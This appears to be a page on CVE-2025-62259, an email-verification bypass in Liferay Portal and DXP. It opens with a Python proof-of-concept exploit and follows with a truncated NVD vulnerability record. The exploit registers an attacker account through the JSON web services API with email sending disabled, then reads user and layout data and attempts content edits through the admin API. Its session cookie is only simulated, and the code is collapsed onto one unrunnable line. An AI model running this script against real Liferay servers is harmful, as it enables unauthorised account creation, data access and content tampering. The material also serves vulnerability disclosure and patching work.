CVE-2025-62259

import requests import json # CVE-2025-62259 PoC - Liferay Portal Email Verification Bypass # Target: Liferay Portal/DXP with vulnerable API endpoints TARGET_URL = "http://target-liferay.com" def create_user(): """Step 1: Create a new user account without email verification""" endpoint = f"{TARGET_URL}/api/jsonws/user/add-user" params = { "companyId": "1", "autoPassword": "true", "passwordReset": "false", "reminderQueryQuestion": "what-is-your-password", "reminderQueryAnswer": "test", "graceLoginCount": "0", "screenName": "attacker_user", "emailAddress": "[email protected]", "facebookId": "0", "languageId": "en_US", "firstName": "Attacker", "lastName": "Test", "prefixId": "0", "suffixId": "0", "male": "true", "birthdayMonth": "1", "birthdayDay": "1", "birthdayYear": "2000", "jobTitle": "", "groupIds": "", "organizationIds": "", "roleIds": "", "userGroupIds": "", "sendEmail": "false" } response = requests.post(endpoint, data=params) return response.json() def access_api_without_verification(auth_cookie): """Step 2: Access and edit content via API without email verification""" headers = {"Cookie": auth_cookie} # Access user info via API users_endpoint = f"{TARGET_URL}/api/jsonws/user/get-user-by-email-address" users_params = {"companyId": "1", "emailAddress": "[email protected]"} users_response = requests.get(users_endpoint, headers=headers, params=users_params) print(f"User Info Retrieved: {users_response.status_code}") # Access layouts via API layouts_endpoint = f"{TARGET_URL}/api/jsonws/layout/get-layouts" layouts_params = {"groupId": "0", "private": "false"} layouts_response = requests.get(layouts_endpoint, headers=headers, params=layouts_params) print(f"Layouts Accessed: {layouts_response.status_code}") # Edit content via headless API edit_endpoint = f"{TARGET_URL}/o/headless-admin-user-api/v1.0/user-accounts" edit_response = requests.patch(edit_endpoint, headers=headers, json={"description": "modified"}) print(f"Content Edit Attempt: {edit_response.status_code}") return layouts_response.json() def main(): print("CVE-2025-62259 PoC - Liferay Portal API Access Before Email Verification") user_result = create_user() print(f"User Created: {user_result}") # Simulate obtaining auth cookie without email verification auth_cookie = "LFR_SESSION_TOKEN=attacker_session; COMPANY_ID=1; USER_ID=12345" access_api_without_verification(auth_cookie) print("PoC completed - API accessed without email verification") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-62259", "sourceIdentifier": "[email protected]", "published": "2025-10-27T23:15:38.670", "lastModified": "2025-12-08T14:36:32.910", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Liferay Portal 7.4.0 through 7.4.3.109, and older unsupported versions, and Liferay DXP 2023.Q3.1 through 2023.Q3.4, 7.4 GA through update 92, 7.3 GA through update 35, and older unsupported versions does not limit access to APIs before a user has verified their email address, which allows remote users to access and edit content via the API."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionEndIncluding": "7.0", "matchCriteriaId": "E1965F47-C462-45E8-98EA-A9F2582C1027"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.1:*:*:*:*:*:*:*", "matchCriteriaId": "5E153DAE-AA7E-4CDA-95EE-813BDC74FB44"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.2:*:*:*:*:*:*:*", "matchCriteriaId": "A2EA51C4-32C3-4B1A-B7D6-BAFA84E75E68"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:-:*:*:*:*:*:*", "matchCriteriaId": "6F6A98ED-E694-4F39-95D0-C152BD1EC115"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:fix_pack_1:*:*:*:*:*:*", "matchCriteriaId": "2CD6861A-D546-462F-8B22-FA76A4AF8A9C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:fix_pack_2:*:*:*:*:*:*", "matchCriteriaId": "324BB977-5AAC-4367-98FC-605FF4997B3F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:service_pack_1:*:*:*:*:*:*", "matchCriteriaId": "2BBA40AC-4619-434B-90CF-4D29A1CA6D86"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:service_pack_2:*:*:*:*:*:*", "matchCriteriaId": "135BED68-C2EC-4EE7-9138-91E0EE3608EB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:service_pack_3:*:*:*:*:*:*", "matchCriteriaId": "728DF154-F19F-454C-87CA-1E755107F2A6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update1:*:*:*:*:*:*", "matchCriteriaId": "35F42314-AC3F-45B6-8BF8-49811E5F2FAB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update10:*:*:*:*:*:*", "matchCriteriaId": "AA984F92-4C6C-4049-A731-96F587B51E75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update11:*:*:*:*:*:*", "matchCriteriaId": "CADDF499-DDC4-4CEE-B512-404EA2024FCB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update12:*:*:*:*:*:*", "matchCriteriaId": "9EC64246-1039-4009-B9 ... (truncated)